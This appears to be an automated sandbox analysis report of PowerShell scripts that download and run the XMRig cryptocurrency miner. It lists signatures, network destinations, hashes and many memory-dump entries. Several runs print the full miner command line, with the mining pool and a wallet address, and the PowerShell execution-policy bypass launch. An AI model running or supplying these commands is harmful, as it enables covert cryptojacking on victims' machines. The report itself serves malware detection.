N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/416-0-0x00007FFBF9313000-0x00007FFBF9315000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4tyffof3.og2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/416-9-0x000001A235AC0000-0x000001A235AE2000-memory.dmp

memory/416-10-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp

memory/416-11-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp

memory/416-12-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp

memory/416-14-0x000001A235B50000-0x000001A235B62000-memory.dmp

memory/416-15-0x000001A235B40000-0x000001A235B4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3052-46-0x000001C7F7460000-0x000001C7F7480000-memory.dmp

memory/3052-47-0x000001C7F74B0000-0x000001C7F74D0000-memory.dmp

memory/3052-48-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-49-0x000001C7F74D0000-0x000001C7F74F0000-memory.dmp

memory/3052-50-0x000001C7F74F0000-0x000001C7F7510000-memory.dmp

memory/3052-51-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/416-53-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp

memory/416-52-0x00007FFBF9313000-0x00007FFBF9315000-memory.dmp

memory/3052-54-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-55-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-56-0x000001C7F74D0000-0x000001C7F74F0000-memory.dmp

memory/3052-57-0x000001C7F74F0000-0x000001C7F7510000-memory.dmp

memory/3052-58-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-59-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-60-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-61-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-62-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-63-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-64-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-65-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-66-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-67-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-68-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-69-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-70-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-71-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-72-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-73-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-74-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-75-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-76-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-77-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-78-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-79-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-80-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-81-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-82-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-83-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-84-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-85-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-86-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-87-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-88-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-89-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-90-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-91-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-92-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-93-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-94-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-95-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-96-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-97-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-98-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-99-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-100-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-101-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-102-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-103-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-104-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-105-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-106-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-107-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-108-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-109-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-110-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-111-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-112-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-113-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-114-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-115-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

memory/3052-116-0x00007FF755270000-0x00007FF755EA3000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:55

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1747s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/4744-4-0x00007FF804D63000-0x00007FF804D64000-memory.dmp

memory/4744-6-0x0000023B6D400000-0x0000023B6D422000-memory.dmp

memory/4744-9-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4744-11-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4744-10-0x0000023B6D600000-0x0000023B6D676000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zhr3ujhh.wzp.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4744-28-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4744-51-0x0000023B6D5C0000-0x0000023B6D5D2000-memory.dmp

memory/4744-64-0x0000023B6D550000-0x0000023B6D55A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4800-93-0x000001EECCBD0000-0x000001EECCBF0000-memory.dmp

memory/4800-94-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-95-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4744-96-0x00007FF804D63000-0x00007FF804D64000-memory.dmp

memory/4744-97-0x00007FF804D60000-0x00007FF80574C000-memory.dmp

memory/4800-98-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-99-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-100-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-101-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-102-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-103-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-104-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-105-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-106-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-107-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-108-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-109-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-110-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-111-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-112-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-113-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-114-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-115-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-116-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-117-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-118-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-119-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-120-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-121-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-122-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-123-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-124-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-125-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-126-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-127-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-128-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-129-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-130-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-131-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-132-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-133-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-134-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-135-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-136-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-137-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-138-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-139-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-140-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-141-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-142-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-143-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-144-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-145-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-146-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-147-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-148-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-149-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-150-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-151-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-152-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-153-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-154-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-155-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-156-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-157-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

memory/4800-158-0x00007FF73E160000-0x00007FF73ED93000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:59

Platform

win10-20240404-en

Max time kernel

1789s

Max time network

1780s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/2520-3-0x00007FFF034F3000-0x00007FFF034F4000-memory.dmp

memory/2520-5-0x000001C47E010000-0x000001C47E032000-memory.dmp

memory/2520-8-0x000001C47E1C0000-0x000001C47E236000-memory.dmp

memory/2520-9-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmp

memory/2520-10-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dgx5w400.xtt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2520-25-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmp

memory/2520-48-0x000001C47E340000-0x000001C47E352000-memory.dmp

memory/2520-61-0x000001C47E1A0000-0x000001C47E1AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1636-90-0x000002432B870000-0x000002432B890000-memory.dmp

memory/1636-91-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-92-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/2520-93-0x00007FFF034F3000-0x00007FFF034F4000-memory.dmp

memory/2520-94-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmp

memory/2520-95-0x00007FFF034F0000-0x00007FFF03EDC000-memory.dmp

memory/1636-96-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-97-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-98-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-99-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-100-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-101-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-102-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-103-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-104-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-105-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-106-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-107-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-108-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-109-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-110-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-111-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-112-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-113-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-114-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-115-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-116-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-117-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-118-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-119-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-120-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-121-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-122-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

memory/1636-123-0x00007FF64D5D0000-0x00007FF64E203000-memory.dmp

